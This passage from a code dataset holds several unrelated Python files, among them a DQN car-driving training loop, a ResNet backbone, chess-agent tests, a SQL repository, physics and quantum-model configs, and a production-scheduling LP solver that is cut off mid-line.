\"AgentTrain\"\r\n    env = CarEnv()\r\n    obs = env.reset()\r\n    act = env.action_space()\r\n    obs_shape = env.obs_shape()\r\n    action_shape = len(act)\r\n    agent = DQNAgent(obs_shape,action_shape)\r\n    episode_rewards = list() \r\n    \r\n    previous_checkpoint_mean_ep_rew = agent.best_mean_reward\r\n    num_improved_episodes_before_checkpoint = 0\r\n    \r\n    if load_trained_model:\r\n        try:\r\n            agent.load(env_name)\r\n            previous_checkpoint_mean_ep_rew = agent.best_mean_reward\r\n        except FileNotFoundError:\r\n            print(\"ERROR: no existe ningún modelo entrenado para este entorno. 
Empezamos desde cero\")\r\n\r\n    episode = 0\r\n    \r\n    while global_step_num < MAX_NUM_EPISODES:\r\n        obs = env.reset()\r\n        total_reward = 0.0\r\n        done = False\r\n        step = 0\r\n        env.collision_hist = []\r\n        while not done:\r\n            action = agent.get_action(obs)\r\n            next_obs, reward, done, info = env.step(action)\r\n            agent.learn(obs, action, reward, next_obs, done)\r\n            agent.memory.store(Experience(obs, action, reward, next_obs, done))\r\n\r\n            obs = next_obs\r\n            total_reward += reward\r\n            step += 1\r\n            \r\n            \r\n            if done is True:\r\n                \r\n                episode += 1\r\n                episode_rewards.append(total_reward)\r\n                global_step_num += 1\r\n\r\n                if total_reward > agent.best_reward:\r\n                    agent.best_reward = total_reward\r\n                for actor in env.actor_list:\r\n                    actor.destroy()\r\n                if np.mean(episode_rewards) > previous_checkpoint_mean_ep_rew: \r\n                    num_improved_episodes_before_checkpoint += 1\r\n\r\n                if num_improved_episodes_before_checkpoint >= 100:\r\n                    previous_checkpoint_mean_ep_rew = np.mean(episode_rewards)\r\n                    agent.best_mean_reward = np.mean(episode_rewards)\r\n                    agent.save(env_name)\r\n                    num_improved_episodes_before_checkpoint = 0\r\n\r\n                print(\"\\n Episodio #{} finalizado con {} iteraciones. recompensa = {}, recompensa media = {:.2f}, mejor recompensa = {}\".\r\n                      format(episode, step+1, total_reward, np.mean(episode_rewards), agent.best_reward))\r\n\r\n                writer.add_scalar(\"main/ep_reward\", total_reward, global_step_num)\r\n                writer.add_scalar(\"main/mean_ep_reward\", np.mean(episode_rewards), global_step_num)\r\n                writer.add_scalar(\"main/max_ep_reward\", agent.best_reward, global_step_num)\r\n\r\n        if agent.memory.get_size() >= 5*100000:\r\n            agent.replay_experience()\r\n\r\n        #break\r\n","sub_path":"Env_Car.py","file_name":"Env_Car.py","file_ext":"py","file_size_in_byte":13092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"440210855","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom model.utils.config import cfg\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport math\nimport torch.utils.model_zoo as model_zoo\nimport pdb\nimport torchvision.models as models\n\n\nclass ResNetBackBone(nn.Module):\n    def __init__(self, num_layers=101, pretrained=False):\n        self.model_path = 'data/pretrained_model/resnet101_caffe.pth'\n        self.dout_rpn = 1024\n        self.dout_fts = 2048\n        self.pretrained = pretrained\n\n        super(ResNetBackBone, self).__init__()\n\n    def init_modules(self):\n        resnet = models.resnet101()\n\n        if self.pretrained == True:\n            print(\"Loading pretrained weights from %s\" %(self.model_path))\n            state_dict = torch.load(self.model_path)\n            resnet.load_state_dict({k:v for k,v in state_dict.items() if k in resnet.state_dict()})\n\n        # Build resnet.\n        self.RCNN_base = nn.Sequential(resnet.conv1, resnet.bn1,resnet.relu,\n            resnet.maxpool,resnet.layer1,resnet.layer2,resnet.layer3)\n\n        self.RCNN_top = nn.Sequential(resnet.layer4)\n\n        # Fix blocks\n        for p in self.RCNN_base[0].parameters(): p.requires_grad=False\n        for p in self.RCNN_base[1].parameters(): p.requires_grad=False\n\n        assert (0 <= cfg.RESNET.FIXED_BLOCKS < 4)\n        if cfg.RESNET.FIXED_BLOCKS >= 3:\n            for p in self.RCNN_base[6].parameters(): p.requires_grad=False\n        if cfg.RESNET.FIXED_BLOCKS >= 2:\n            for p in self.RCNN_base[5].parameters(): p.requires_grad=False\n        if cfg.RESNET.FIXED_BLOCKS >= 1:\n            for p in self.RCNN_base[4].parameters(): p.requires_grad=False\n\n        def set_bn_fix(m):\n            
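# helper applied below: turn off gradients for every BatchNorm layer so its parameters stay frozen\n            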
classname = m.__class__.__name__\n if classname.find('BatchNorm') != -1:\n for p in m.parameters(): p.requires_grad=False\n\n self.RCNN_base.apply(set_bn_fix)\n self.RCNN_top.apply(set_bn_fix)\n\n def train(self, mode=True):\n # Override train so that the training mode is set as we want\n nn.Module.train(self, mode)\n if mode:\n # Set fixed blocks to be in eval mode\n self.RCNN_base.eval()\n self.RCNN_base[5].train()\n self.RCNN_base[6].train()\n\n def set_bn_eval(m):\n classname = m.__class__.__name__\n if classname.find('BatchNorm') != -1:\n m.eval()\n\n self.RCNN_base.apply(set_bn_eval)\n self.RCNN_top.apply(set_bn_eval)\n\n def head_to_tail(self, pool5):\n fc7 = self.RCNN_top(pool5).mean(3).mean(2)\n return fc7\n","sub_path":"lib/model/faster_rcnn/resnet.py","file_name":"resnet.py","file_ext":"py","file_size_in_byte":2483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"19625503","text":"import board as b\nimport pieces as p\nimport time\nimport boardOperator as o\nfrom alphaBetaAgent import AlphaBetaAgent\nfrom randomAgent import RandomAgent\nfrom humanAgent import HumanAgent\nimport multiprocessing as mp\n\ndef test1():\n \"\"\"\n board = b.Board()\n board.nukeBoard()\n board.board[1][1] = p.Rook('white')\n board.board[1][1].rank = 1\n board.board[1][1].column = 1\n board.printBoard()\n print(board.getWhiteMoves())\n board.board[1][4] = p.Pawn('white')\n board.board[1][4].rank = 1\n board.board[1][4].column = 4\n board.board[3][1] = p.Pawn('black')\n board.board[3][1].rank = 3\n board.board[3][1].column = 1\n board.printBoard()\n print(board.getWhiteMoves())\n \"\"\"\n pass\n\ndef test2():\n \"\"\"\n game = o.Operator()\n whitePlayer = RandomAgent('white')\n blackPlayer = RandomAgent('black')\n\n count = 0\n\n moves = 0\n\n start = time.time()\n\n while True:\n count += 1\n\n if count % 20 == 0:\n game.mainBoard = b.Board()\n\n #moves += len(game.getBoard().getWhiteMoves())\n\n move = whitePlayer.getMove(game.getBoard())\n result = game.makeMove(move)\n blackPlayer.sendMove(move)\n if result != 0:\n break\n\n #moves += len(game.getBoard().getBlackMoves())\n\n move = blackPlayer.getMove(game.getBoard())\n result = game.makeMove(move)\n whitePlayer.sendMove(move)\n if result != 0:\n break\n\n if time.time() - start > 10:\n break\n\n game.getBoard().printBoard()\n print(count, 'moves')\n #print(moves/(count*2), 'average moves')\n print(time.time() - start)\n \"\"\"\n pass\n\ndef test3(i):\n start = time.time()\n for y in range(50):\n board = b.Board()\n whitePlayer = RandomAgent('white')\n blackPlayer = RandomAgent('black')\n for x in range(20):\n move = whitePlayer.getMove(board.clone())\n if move == 'help':\n break\n board.move(move)\n move = blackPlayer.getMove(board.clone())\n if move == 'help':\n break\n board.move(move)\n\n print(i, time.time()-start)\n\ndef test4(cores, sprints):\n start = time.time()\n pool = mp.Pool(cores)\n rounds = list(range(sprints))\n pool.map(test3, rounds)\n print(\"done,\", time.time()-start)\n\ndef test5():\n start = time.time()\n board = b.Board()\n whitePlayer = RandomAgent('white')\n blackPlayer = RandomAgent('black')\n for x in range(20):\n move = whitePlayer.getMove(board.clone())\n if move == 'help':\n break\n board.move(move)\n move = blackPlayer.getMove(board.clone())\n if move == 'help':\n break\n board.move(move)\n print(time.time()-start)\n board.printBoard()\n return board\n\ndef test6():\n start = time.time()\n board = b.Board()\n whitePlayer = RandomAgent('white')\n blackPlayer = 
RandomAgent('black')\n while True:\n move = whitePlayer.getMove(board.clone())\n if move == 'help':\n break\n board.move(move)\n move = blackPlayer.getMove(board.clone())\n if move == 'help':\n break\n board.move(move)\n if len(board.getWhiteMoves()) < 10:\n break\n print(time.time()-start)\n board.printBoard()\n return board\n\ndef test7(moves):\n start = time.time()\n board = b.Board()\n whitePlayer = RandomAgent('white')\n blackPlayer = RandomAgent('black')\n for x in range(moves):\n move = whitePlayer.getMove(board.clone())\n if move == 'help':\n break\n board.move(move)\n move = blackPlayer.getMove(board.clone())\n if move == 'help':\n break\n board.move(move)\n print(time.time()-start)\n board.printBoard()\n return board\n\ndef test8(colour):\n if colour == 'white':\n whitePlayer = HumanAgent('white')\n blackPlayer = RandomAgent('black')\n else:\n whitePlayer = RandomAgent('white')\n blackPlayer = HumanAgent('black')\n\n game = o.Operator(whitePlayer, blackPlayer)\n\n game.run()\n\ndef test9():\n whitePlayer = HumanAgent('white')\n blackPlayer = HumanAgent('black')\n\n game = o.Operator(whitePlayer, blackPlayer)\n\n result = game.run()\n\ndef test10():\n whitePlayer = RandomAgent('white')\n blackPlayer = RandomAgent('black')\n\n game = o.Operator(whitePlayer, blackPlayer)\n\n result = game.run(['verbose'])\n\ndef test11(x):\n whitePlayer = RandomAgent('white')\n blackPlayer = RandomAgent('black')\n board = b.Board()\n start = time.time()\n count = 0\n while time.time() - start < 10:\n count += 1\n\n if count % 20 == 0:\n board = b.Board()\n\n move = whitePlayer.getMove(board.clone())\n if move == 'help':\n board = b.Board()\n continue\n board.move(move)\n\n move = blackPlayer.getMove(board.clone())\n if move == 'help':\n board = b.Board()\n continue\n board.move(move)\n print(x, \":\", count, 'moves')\n\ndef test12(cores, sprints):\n pool = mp.Pool(cores)\n rounds = list(range(sprints))\n pool.map(test11, rounds)\n\ndef test13():\n whitePlayer = RandomAgent('white')\n blackPlayer = RandomAgent('black')\n\n game = o.Operator(whitePlayer, blackPlayer)\n\n while True:\n result = game.run()\n if result != 4:\n break\n\ndef test14():\n whitePlayer = RandomAgent('white')\n blackPlayer = RandomAgent('black')\n board = b.Board()\n count = 0\n while True:\n count += 1\n\n if count % 20 == 0:\n return board\n\n move = whitePlayer.getMove(board.clone())\n if move == 'help':\n return board\n board.move(move)\n\n move = blackPlayer.getMove(board.clone())\n if move == 'help':\n return board\n board.move(move)\n\ndef test15():\n whitePlayer = RandomAgent('white')\n blackPlayer = RandomAgent('black')\n board = b.Board()\n count = 0\n while True:\n count += 1\n\n if count % 20 == 0:\n break\n\n move = whitePlayer.getMove(board.clone())\n if move == 'help':\n return\n board.move(move)\n\n move = blackPlayer.getMove(board.clone())\n if move == 'help':\n return\n board.move(move)\n\n start = time.time()\n count = 0\n while time.time() - start < 10:\n count += 1\n if count % 2 == 0:\n x = board.getMoves('white')\n y = board.getMoves('black')\n else:\n y = board.getMoves('white')\n x = board.getMoves('black')\n board.printBoard()\n print(x, y)\n print(len(x), len(y))\n print(count)\n\ndef test16(args):\n whitePlayer = RandomAgent('white')\n blackPlayer = RandomAgent('black')\n\n game = o.Operator(whitePlayer, blackPlayer)\n\n result = game.run(args)\n\ndef test17(id, endTime):\n whitePlayer = RandomAgent('white')\n blackPlayer = RandomAgent('black')\n board = b.Board()\n start = time.time()\n count = 0\n 
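# play random-vs-random moves until the endTime budget expires, resetting the board every 20 moves or whenever an agent returns 'help'\r\n    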
while time.time() - start < endTime:\n count += 1\n\n if count % 20 == 0:\n board = b.Board()\n\n move = whitePlayer.getMove(board.clone())\n if move == 'help':\n board = b.Board()\n continue\n board.move(move)\n\n move = blackPlayer.getMove(board.clone())\n if move == 'help':\n board = b.Board()\n continue\n board.move(move)\n print(\"ID:\", id, \"Run Time:\", endTime, \"Move Count:\", count)\n return count\n\ndef test18(cores, sprints, clock):\n start = time.time()\n pool = mp.Pool(cores)\n result = []\n for i in range(sprints):\n pool.apply_async(test17, args=(i, clock), callback=result.append)\n pool.close()\n pool.join()\n end = time.time()\n total = 2*sum(result)\n average = total/(end-start)\n print(\"Total Moves:\", total)\n print(\"Total Time:\", end-start)\n print(\"Average:\", average)\n return average\n\ndef test19(cores):\n average = []\n average.append(test18(cores, 480, 1))\n average.append(test18(cores, 240, 2))\n average.append(test18(cores, 160, 3))\n average.append(test18(cores, 120, 4))\n average.append(test18(cores, 80, 6))\n average.append(test18(cores, 40, 12))\n average.append(test18(cores, 24, 20))\n average.append(test18(cores, 16, 30))\n print(\"Overall Average:\", sum(average) / 8)\n\nif __name__ == \"__main__\":\n test8('white')\n","sub_path":"PythonServer/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":8470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"338257715","text":"from db.run_sql import run_sql\nfrom models.merchant import Merchant\n\ndef save(merchant):\n sql = \"INSERT INTO merchants( name, active ) VALUES ( %s, %s ) RETURNING id\"\n values = [merchant.name, merchant.active]\n results = run_sql( sql, values )\n merchant.id = results[0]['id']\n return merchant\n\n\ndef select_all():\n merchants = []\n\n sql = \"SELECT * FROM merchants\"\n results = run_sql(sql)\n\n for row in results:\n merchant = Merchant(row['name'], row['active'], row['id'])\n merchants.append(merchant)\n return merchants\n\n\ndef select(id):\n merchant = None\n sql = \"SELECT * FROM merchants WHERE id = %s\"\n values = [id]\n result = run_sql(sql, values)[0]\n\n if result is not None:\n merchant = Merchant(result['name'], result['active'], result['id'] )\n return merchant\n\n\ndef delete_all():\n sql = \"DELETE FROM merchants\"\n run_sql(sql)\n\ndef delete(id):\n sql = \"DELETE FROM merchants WHERE id = %s\"\n values = [id]\n run_sql(sql, values)\n\ndef update(merchant):\n sql = \"UPDATE merchants SET ( name, active ) = ( %s, %s ) WHERE id = %s\"\n values = [merchant.name, merchant.active, merchant.id]\n run_sql(sql, values)","sub_path":"repositories/merchant_repository.py","file_name":"merchant_repository.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"85632331","text":"'''\nCreated on Dec 29, 2015\n\n@author: rasmus\n'''\n\n\nimport numpy as np\nimport sys\n\nID_COUNTER = 1\nids_in_use = {}\n\n\ndef get_unique_id():\n global ID_COUNTER\n temp = ID_COUNTER\n ID_COUNTER += 1\n return temp\n\n\ndef old_get_unique_id():\n global ids_in_use\n new_id = np.random.randint(low=-sys.maxsize - 1,\n high=sys.maxsize)\n\n if new_id not in ids_in_use.keys():\n ids_in_use.setdefault(new_id, None)\n return new_id\n else:\n return 
old_get_unique_id()","sub_path":"rl_simulator/src/utilities/ids.py","file_name":"ids.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"52337233","text":"# Euler Problem Number 15\r\n# How many routes exist through a 20x20 grid (allowing only movements down and right)?\r\n\r\nimport math\r\n\r\n# n is the dimension of the square grid\r\ndef run(n):\r\n\tpaths = 1\r\n\r\n\tfor i in range(1, n + 1):\r\n\t\tpaths = paths * (n+i)//i\r\n\r\n\treturn paths\r\n\r\nif __name__ == \"__main__\":\r\n\r\n\tprint(run(20))\r\n","sub_path":"Python/problem_15.py","file_name":"problem_15.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"20516935","text":"import abc\nimport nltk\nfrom re import *\n\nfrom infopuls_crawler.question_answering.qa_model import get_model, get_answer\n\n\nclass UserRequest(object):\n    \"\"\"Request data class\"\"\"\n\n    chat_id = None\n    session_id = None\n    text = None\n\n    def __init__(self, chat_id, session_id, text):\n        self.chat_id = chat_id\n        self.session_id = session_id\n        self.text = text\n\n\nclass UserResponse(object):\n    \"\"\"Response data class\"\"\"\n\n    text = None\n\n    def __init__(self, text):\n        self.text = text\n\n\nclass Handler(object):\n\n    def __init__(self, successor=None):\n        self._successor = successor\n\n    def process_request(self, input):\n        result = self.handle(input)\n        if result is not None:\n            return result\n        elif self._successor is not None:\n            return self._successor.process_request(input)\n        else:\n            # cannot answer the question itself\n            return UserResponse(\"Please contact our support.\")\n\n    @abc.abstractmethod\n    def handle(self, input):\n        return None\n\n\nclass FilterIrrelevant(Handler):\n    # set of irrelevant question templates\n    bad_questions = [\n        r\"fuck\"\n    ]\n\n    def handle(self, input):\n        for pattern in self.bad_questions:\n            if pattern in input.text:\n                return UserResponse(\"The question is not appropriate.\")\n\n\nclass QuestionHandler(Handler):\n\n    model = get_model()\n\n    question_words = [\n        \"what \",\n        \"what's\",\n        \"who\",\n        \"who's\",\n        \"where\",\n        \"where's\",\n        \"why \",\n        \"why's \",\n        \"whom \",\n        \"which \",\n        \"how \",\n        \"when \"\n    ]\n\n\n    def handle(self, input):\n        text = input.text\n\n        user_questions = text\n\n        best_sentence, score = get_answer(self.model, user_questions)\n        print(\"sentence: \" + str(best_sentence) + \", score: \" + str(score))\n        if best_sentence is None:\n            return None\n        else:\n            return UserResponse(best_sentence)\n\n\ndef handlers():\n    handler1 = QuestionHandler()\n    handler2 = FilterIrrelevant(handler1)\n    return handler2\n\n\ndef main():\n    handler = handlers()\n    print(handler.process_request(UserRequest(\"chat1\", \"session1\", \"s fsdtext\")).text)\n\n    questions = \"What is Infopulse? 
How many employees the company use?\"\n sentences = questions.split()\n\n for sentence in sentences:\n print(sentence)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"infopuls_crawler/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":2441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"103287523","text":"#!/usr/bin/python3\n\"\"\"\nSay my name\nfunction that prints strings\nTake two strings\n\"\"\"\n\n\ndef say_my_name(first_name, last_name=\"\"):\n \"\"\"\n Return a string with the full name\n \"\"\"\n if not isinstance(first_name, str):\n raise TypeError(\"first_name must be a string\")\n if not isinstance(last_name, str):\n raise TypeError(\"last_name must be a string\")\n print(\"My name is {} {}\".format(first_name, last_name))\n","sub_path":"0x07-python-test_driven_development/3-say_my_name.py","file_name":"3-say_my_name.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"16469088","text":"from ChairClassExtension import Calculator\ndef main():\n print(\"------------Comfort Chair Hire - Hire Bookings-----------\\n\")\n Name = input(\"Please input Contact/Company name:\")\n print(\"PS - (Packer Stacker Chair - $5.00), HB - (High Back Plastic Chairs $10.50),L - (Lecture Chairs $15.00)\")\n Type = input(\"Prefered chair type :\")\n Number = int(input(\"Number of chair required :\"))\n Time = int(input(\"Please enter the duration of the hire (in days) :\"))\n print(\"------------Chair Hire Quotaion --------------------------\\n\")\n Example = Calculator(Name,Number,Time,Type.lower()) #name,number,time,type\n print(Example)\nmain()\n","sub_path":"Python3语法/面向对象/ChairInterface.py","file_name":"ChairInterface.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"588672436","text":"import FWCore.ParameterSet.Config as cms\n\nfrom FWCore.ParameterSet.VarParsing import VarParsing\noptions = VarParsing ('python')\noptions.setDefault('inputFiles','file:input.root')\noptions.setDefault('outputFile','output.root')\noptions.setDefault('maxEvents',-1)\noptions.parseArguments()\n\nprocess = cms.Process('TEST')\n\nprocess.source = cms.Source(\n \"PoolSource\",\n #fileNames = cms.untracked.vstring(options.inputFiles),\n #fileNames = cms.untracked.vstring(files[:4]),\n #fileNames = cms.untracked.vstring('/afs/cern.ch/user/b/bainbrid/work/public/5-full-chain/20-retrain-id/CMSSW_10_2_13/src/1-miniaod-from-crab'),\n fileNames = cms.untracked.vstring('/store/mc/RunIIAutumn18RECOBParking/BuToKJpsi_Toee_MuFilter_SoftQCDnonD_TuneCP5_13TeV-pythia8-evtgen/AODSIM/PUPoissonAve20_BParking_Bparking_102X_upgrade2018_realistic_v15-v1/110000/968D9C40-A196-C746-B16C-27E90DFC17DB.root'),\n #fileNames = cms.untracked.vstring('/store/data/Run2018A/ParkingBPH1/AOD/22Mar2019-v1/260005/A032FCE0-D492-D94E-9404-EF96EB3A84BB.root'), # data, AOD\n #fileNames = cms.untracked.vstring('/store/data/Run2018A/ParkingBPH1/MINIAOD/22Mar2019-v1/260002/54516928-947E-6140-A489-4E4099A593CF.root'), # data, MINIAOD\n secondaryFileNames = cms.untracked.vstring()\n )\n\nprocess.maxEvents = cms.untracked.PSet(\n input = cms.untracked.int32(options.maxEvents)\n )\n\nprocess.TFileService = cms.Service(\n \"TFileService\",\n fileName = cms.string(options.outputFile)\n )\n\nprocess.ntuplizer_seq = cms.Sequence()\n\nfrom PhysicsTools.SelectorUtils.tools.vid_id_tools import 
*\nswitchOnVIDElectronIdProducer(process,DataFormat.MiniAOD)\nfor idmod in ['RecoEgamma.ElectronIdentification.Identification.mvaElectronID_Fall17_noIso_V2_cff'] : \n setupAllVIDIdsInModule(process,idmod,setupVIDElectronSelection)\n\nprocess.electronMVAVariableHelper.srcMiniAOD = 'slimmedLowPtElectrons'\n#process.electronMVAVariableHelper.vertexCollectionMiniAOD = 'offlineSlimmedPrimaryVertices'\n#process.electronMVAVariableHelper.conversionsMiniAOD = 'gsfTracksOpenConversions'\n#process.electronMVAVariableHelper.beamSpotMiniAOD = 'offlineBeamSpot'\nprocess.ntuplizer_seq *= process.electronMVAVariableHelper\n\nprocess.electronMVAValueMapProducer.srcMiniAOD = 'slimmedLowPtElectrons'\nprocess.ntuplizer_seq *= process.electronMVAValueMapProducer\n\nprocess.load('LowPtElectrons.LowPtElectrons.IDFeatures_cfi')\nprocess.ntuplizer_seq *= process.features\n\nprocess.ntuplizer_path = cms.Path(process.ntuplizer_seq)\nprocess.schedule = cms.Schedule(process.ntuplizer_path)\n","sub_path":"run/ntuplizer_cfg.py","file_name":"ntuplizer_cfg.py","file_ext":"py","file_size_in_byte":2530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"216279415","text":"# Copyright 2021 The NetKet Authors - All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport netket as nk\n\nimport jax.numpy as jnp\n\n\ndef mycb(step, logged_data, driver):\n logged_data[\"acceptance\"] = float(driver.state.sampler_state.acceptance)\n return True\n\n\ndef minimum_distance(x, sdim):\n\n n_particles = x.shape[0] // sdim\n x = x.reshape(-1, sdim)\n\n distances = (-x[jnp.newaxis, :, :] + x[:, jnp.newaxis, :])[\n jnp.triu_indices(n_particles, 1)\n ]\n return jnp.linalg.norm(distances, axis=1)\n\n\ndef potential(x):\n dis = minimum_distance(x, 1)\n\n dis = jnp.sin(jnp.pi / L * dis) ** 2\n beta = 2.0\n g = (jnp.pi / L) ** 2 * beta * (beta - 1)\n\n return jnp.sum(g / dis)\n\n\nL = 15.0\n\nhilb = nk.hilbert.Particle(N=10, L=(L,), pbc=True)\n\nsab = nk.sampler.SingleMetropolisGaussian(hilb, sigma=1.0, n_chains=16)\n\nmodel = nk.models.DeepSet(\n k=4,\n L=L,\n sdim=1,\n layers_phi=2,\n layers_rho=3,\n features_phi=(16, 16),\n features_rho=(16, 16, 1),\n)\n# model = nk.models.Gaussian()\nekin = nk.operator.KineticEnergy(hilb, mass=1.0)\npot = nk.operator.PotentialEnergy(hilb, potential)\nha = ekin + pot\n\nvs = nk.vqs.MCState(sab, model, n_samples=10**4, n_discard_per_chain=2000)\n\"\"\"\nimport flax\nwith open(r'/home/gabriel/Documents/PhD/netket/Examples/Continuous/CS/CS_10_1d.mpack', 'rb') as file:\n vs.variables = flax.serialization.from_bytes(vs.variables, file.read())\n\"\"\"\nop = nk.optimizer.Sgd(0.01)\nsr = nk.optimizer.SR(diag_shift=0.01)\n\ngs = nk.VMC(ha, op, sab, variational_state=vs) # , preconditioner=sr)\ngs.run(n_iter=100, callback=mycb, out=\"test\")\n","sub_path":"Examples/Continuous/CS/CS.py","file_name":"CS.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} 
+{"seq_id":"597998593","text":"# Copyright 2020,2021 Sony Corporation.\n# Copyright 2021 Sony Group Corporation.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport pytest\n\nfrom nnabla_rl.environment_explorer import _is_end_of_episode\n\n\nclass TestEnvironmentExplorer(object):\n @pytest.mark.parametrize(\"done\", [True, False])\n @pytest.mark.parametrize(\"timelimit\", [True, False])\n @pytest.mark.parametrize(\"timelimit_as_terminal\", [True, False])\n def test_is_end_of_episode(self, done, timelimit, timelimit_as_terminal):\n end_of_episode = _is_end_of_episode(done, timelimit, timelimit_as_terminal)\n if not done:\n assert end_of_episode is False\n else:\n # All the case that done == True\n if timelimit and timelimit_as_terminal:\n assert end_of_episode is True\n elif timelimit and not timelimit_as_terminal:\n assert end_of_episode is False\n elif not timelimit:\n assert end_of_episode is True\n else:\n raise RuntimeError\n\n\nif __name__ == '__main__':\n pytest.main()\n","sub_path":"tests/test_environment_explorer.py","file_name":"test_environment_explorer.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"516989037","text":"from __future__ import unicode_literals\n\nfrom django.contrib import admin\n'''\nfrom .models import Register\nfrom .models import Volunteer\nfrom .models import BookNow\n'''\nfrom app.models import Register,Volunteer,BookNow\n\n@admin.register(Register)\nclass AppAdmin(admin.ModelAdmin):\n\tlist_display = ('username','first_name', 'created_at', 'modified_at',)\n\n@admin.register(Volunteer)\nclass AppVolunteer(admin.ModelAdmin):\n\tlist_display = ('username','first_name', 'created_at', 'modified_at',)\n\n@admin.register(BookNow)\nclass WebAdmin(admin.ModelAdmin):\n\tlist_display = ('first_name', 'last_name', 'created_at', 'modified_at',)\n'''\nadmin.site.register(Register)\nadmin.site.register(Volunteer)\nadmin.site.register(BookNow)\n'''\n","sub_path":"app/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"361504324","text":"import multiprocessing\nfrom collections import defaultdict\n\nfrom pulp import *\n\nfrom instance_reader import *\n\n\nclass GurobiSolver:\n\n def __init__(self):\n import gurobipy as gp\n self.m = gp.Model(\"mip1\")\n\n def int_var(self, min, max, name):\n from gurobipy import GRB\n return self.m.addVar(lb=min, ub=max, vtype=GRB.INTEGER, name=name)\n\n def float_var(self, min, max, name):\n from gurobipy import GRB\n return self.m.addVar(lb=min, ub=max, vtype=GRB.CONTINUOUS, name=name)\n\n def constraint(self, what, name):\n return self.m.addConstr(what, name=name)\n\n def solve(self, time_limit):\n # self.m.Params.MIPGap = 0.01\n self.m.Params.TimeLimit = time_limit\n return self.m.optimize()\n\n def minimize(self, what):\n from gurobipy import GRB\n return self.m.setObjective(what, GRB.MINIMIZE)\n\n def 
value(self, v):\n return v.X\n\n def set_default_value(self, v, val):\n v.start = val\n\n def get_objective_value(self):\n return self.m.getObjective().getValue()\n\n @property\n def mip_gap(self):\n return self.m.MIPGap\n\n @property\n def mip_gap_abs(self):\n return self.m.getObjective().getValue()-self.m.ObjBound\n\nclass SolverInterface:\n\n def __init__(self):\n self.m = LpProblem(\"Kostwein\", LpMinimize)\n\n def int_var(self, min, max, name):\n return LpVariable(name, min, max, cat=\"Integer\")\n\n def constraint(self, what, name=None):\n assert len(name) <= 255, name\n self.m.addConstraint(what, name)\n\n def solve(self, solver=None):\n return self.m.solve(solver)\n\n def minimize(self, what):\n self.m += what\n\n def value(self, v):\n return v.varValue\n\n def set_default_value(self, v, val):\n v.setInitialValue(val)\n\n def get_objective_value(self):\n return value(self.m.ObjBound)\n\n\ndef solve_with_lp(task_list: List[Task], machine_list: List[Machine], job_list: List[Job], setup, cm: CapacityManager2, solver_backend=None, obj_dv=0):\n from time import time\n start = time()\n solver = GurobiSolver()\n\n machine_time_task_sum = defaultdict(lambda: defaultdict(lambda: []))\n warm_start = 'warmStart' in setup and setup['warmStart']\n\n # every task(part) is started exactly once\n for task in task_list:\n task.solver_vars_per_timestep = {}\n # start date in real time: consecutive constraints\n task.solver_assigned_start = 0\n # start date in \"machine time\" (non-working days not computed): no interruption of task\n task.solver_assigned_start_machine_time = 0\n job_length = len(task.job.tasks) + sum([t.free_days_before for t in task.job.tasks])\n for t in range(task.earliest_start, task.job.tasks[-1].result_processing_day + 10 - task.min_days_after):\n if task.machine.capacity(t, cm):\n v = solver.int_var(0, 1, f'Task {task.id} start at {t}')\n if warm_start:\n solver.set_default_value(v, 1 if task.result_processing_day == t else 0)\n machine_time_task_sum[t][task.machine.id].append({\n 'var': v,\n 'sum': task.length,\n 'machine': task.machine,\n 't': t,\n })\n task.solver_vars_per_timestep[t] = v\n task.solver_assigned_start += v * t\n task.solver_assigned_start_machine_time += v * task.machine.virtual_t(t, cm)\n solver.constraint(sum(task.solver_vars_per_timestep.values()) == 1, name=f'Perform task {task.id} once')\n\n # no more than 24 hrs of work on each day\n for t1 in machine_time_task_sum.values():\n for t in t1.values():\n m: Machine = t[0]['machine']\n time_step = t[0]['t']\n solver.constraint(sum([a['sum'] * 